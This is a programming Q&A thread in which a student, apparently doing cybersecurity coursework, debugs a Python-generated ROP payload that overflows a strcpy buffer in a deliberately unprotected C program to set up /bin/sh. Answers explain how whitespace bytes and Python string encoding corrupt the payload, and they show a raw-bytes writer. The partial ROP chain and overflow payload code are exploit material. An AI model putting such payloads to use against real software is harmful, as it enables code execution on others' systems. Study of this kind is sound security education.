# incorrect strcpy in buffer from python input

Tags: python, c, shell

I'm trying to fill a simple buffer in C with an input generated with Python.  This is practice for a ROP project.  Here's the simple C-code:

```
#include <string.h>    
int main(int argc, char **argv)
{
  char buf[128];
  strcpy(buf, argv[1]);
}
```

compiled as: `gcc -m32 -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 test.c -o test`

my hardware: x86-64, Linux Mint.

Here's part of the python input:

```
from struct import pack    
p = '//bin/sh'  #address 0xffffd15c
p += 'A'*28

#null terminate our string
p += pack("<I", 0x0806e67a) # pop edx ; ret
p += pack("<I", 0xffffd163) # @ "/bin/sh" + 7
p += pack("<I", 0x080bac56) # pop eax ; ret
p += pack("<I", 0xffffffff) # 0xffffffff, or could xor the instruction
p += pack("<I", 0x0807b0cf) # inc eax ; ret
p += pack("<I", 0x08099fad) # mov dword ptr [edx], eax ; ret
```

For some reason when I input this as `argv[1]` the buffer fills correctly up until the last line.  Instead of filling the buffer with `0x08099fad`, it says `0x00009fad`.  There's more input to follow this line, but this is where is screws up, causing the rest of the input to be junk (not what I inputed).

For some reason it seems like a null byte was put into strcpy, possibly terminating it prematurely.  But I don't know where the null byte is.  The same happens when I try to input this address, as well later on: `0x080acedc`.

Any thoughts?

Thanks!

Comment: Perhaps all those concatenations result in a string larger than 127 length. It is certainly close. Be generous and try with a `1000` length string, that should work as a local variable in a simple `main`. Also please check `argc` before using `argv[1]`.

Comment: Hello.  Thanks for the reply.  The intent was to do a buffer overflow and go well beyond the 128 byte allocation.  The python input above is only part of it.  When I comment out the last address, the `0x08099fad`, the rest of the input fills in right after it just fine.  But this one in particular causes the whole input to get messed up during the writing of that address.

Comment: Oh, so is this a deliberate exploit? Why ask for *undefined behaviour* to be explained, when you contrived it? I am sure I not alone in reviling the destructors in this fragile world we live in.

Comment: I'm voting to close this question as off-topic because This site does not welcome those wanting help in breaking our machines.

Comment: Oh sorry. It's a homework problem for a cybersecurity class.

Comment: Does your school run safe-cracking classes too, or internet snooping techniques?

Comment: I'm sorry if this is not an acceptable post. It is for a class. Many schools do secure coding classes now. I can remove this post if you feel it appropriate.

Answer (score 0):

I presume you are providing that string as a command-line argument to your C utility. (By the way, `test` is not a good name for a utility since it is a standard shell function often implemented as a builtin.)

Now suppose you were to invoke your utility from the terminal:

```
./test some thing
```

Clearly `argv[1]` would consist of a four-character word, with another word being placed in `argv[2]`. Had you wanted the single argument to be the entire rest of the command-line, you would need to quote it:

```
./test "some thing"
```

Now, normally when we invoke a utility from a program, we don't actually want the arguments to be interpreted by a shell. We would like to just `exec` the process with an `argv` array with the actual argument strings. That way, we don't have to worry about whitespace and shell metacharacters, and tear our hair out trying to correctly quote an arbitrary string.

But for the benefit of masochists, python provides the possibility os specifying `shell=True`. Even though the manual clearly warns against using this option, and even though people routinely get into trouble using it, it continues to be an oddly popular choice.

By the way, there is no space in your generated program (although their could be). Space is 0x20. But the shell interprets other bytes as whitespace. For example, tab is 0x09. I'll leave it as an exercise to figure out what the consequence of 0x0A is.

Comment: Hmm. Both the 09 and 0a are causing problems. Interesting. Could the 0a be causing a newline?  But doesn't the python string make it read as address bytes, vice ASCII symbols?

Comment: @TRP: bytes are just bytes. They have no type. When you pass a string of bytes to the shell, you are just passing bytes. What mechanism do you imagine which would allow those bytes to be "read as an address"?

Comment: Not sure exactly. But just to clarify, you think the 09 is being interpreted as a tab, while the 0A is being interpreted as a newline?  I'm just curious why in your experience.  I'm new to this. Thanks for the reply.

Comment: @trp: how are you running the C program? Am I wrong that you are using the subprocess module with `shell=True`? Assuming I'm right about that, what would cause the shell to *not* treat a tab character as a tab?

Comment: Hello.  I am currently running it in gdb.  I'm unfamiliar with the `shell=True` statement.  When I run it in gdb, as such: `(gdb) r  ./payload.py` the string starts copying into the buffer.  Everything works find until the 09 or 0A are encountered.  It seems a bit weird to me that those seem to be the only two bytes that cause problems, but just because I'm pretty new at this.

Comment: @TRP: Surely you mean `r $(./payload.py)`? In which case, your python program ends with `print p`?

Answer (score 0):

Just so someone who searches this for an answer gets actual help.

I encountered the same problem today.
What I found out is, that python itself escapes these characters.
If you write the same program in C it will work.
If you print a var like this:

```
jmpto = "\xbf\x84\x04\x08"
print(jmpto)
```

save the output to a file and use a hex editor to view it you will see it actually printed:

```
"C3 BB C2 84 04 08"
```

When I instead tried the same with:

```
jmpto = "\x41\x42\x43\x44"
print(jmpto)
```

looking at it in a hex editor it printed:

```
"41 42 43 44"
```

I sadly don't know a solution as to how to print those characters correctly using python.
Simplest solution seems to be writing it in C.

P.S: @weather-vane, what is the point in shaming someone for being interested to learn how it works underneath the hood?
Security by obscurity (aka not telling so noone finds out) doesn't work.
Someone is gonna break it.
Better show interested white hats how to do it, they might try to fix those problems.

EDIT:
I found the solution to it thanks to someone at Frauenhofer FKIE.
Using *sys.stdout.buffer.write(ex_str)*
Where *ex_str* needs to be of type bytes.
First create your string as a bytearray, than cast it to bytes type:

```
import sys
#convert this Hex Address or Hex ASM Code to int: fb 84 04 08
jmpto = [251, 132, 4, 8]
ex_str = bytes(bytearray(b"A"*(132 + 4)) + bytearray(jmpto))
sys.stdout.buffer.write(ex_str)
```

You can also use subprocess.call() or subprocess.run() to start the executable and pass it the bytes Object.

Hope someone found this helpful.